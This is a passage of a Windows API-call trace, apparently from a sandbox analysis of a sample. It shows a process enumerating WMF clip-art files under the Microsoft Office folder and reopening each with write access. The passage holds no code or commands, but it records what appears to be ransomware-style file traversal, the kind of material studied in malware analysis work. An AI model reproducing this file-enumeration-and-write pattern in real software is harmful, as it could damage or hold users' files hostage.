lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.323] AreFileApisANSI () returned 1 [0101.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0101.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 69 [0101.323] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d74)) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0101.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.323] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN02559_.WMF", cAlternateFileName="")) returned 1 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0101.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0101.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.324] AreFileApisANSI () returned 1 [0101.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0101.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0101.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.325] AreFileApisANSI () returned 1 [0101.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0101.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 69 [0101.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.326] GetFileType (hFile=0x33c) returned 0x1 [0101.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0101.326] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.326] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.326] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.326] CloseHandle (hObject=0x33c) returned 1 [0101.327] AreFileApisANSI () returned 1 [0101.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a828 [0101.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a828, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 69 [0101.327] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.327] GetFileType (hFile=0x33c) returned 0x1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0101.327] CloseHandle (hObject=0x33c) returned 1 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0101.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.328] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.328] AreFileApisANSI () returned 1 [0101.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.328] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0101.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 69 [0101.328] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19e8)) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0101.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.329] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc3d96c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc3d96c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc89dc9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AN02724_.WMF", cAlternateFileName="")) returned 1 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.329] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0101.329] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0101.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.329] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0101.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.330] AreFileApisANSI () returned 1 [0101.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0101.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.330] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0101.330] AreFileApisANSI () returned 1 [0101.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0101.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 69 [0101.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.330] GetFileType (hFile=0x33c) returned 0x1 [0101.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0101.331] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0101.331] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0101.386] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0101.386] CloseHandle (hObject=0x33c) returned 1 [0101.386] AreFileApisANSI () returned 1 [0101.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a5c8 [0101.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 69 [0101.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0101.387] GetFileType (hFile=0x33c) returned 0x1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.387] CloseHandle (hObject=0x33c) returned 1 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 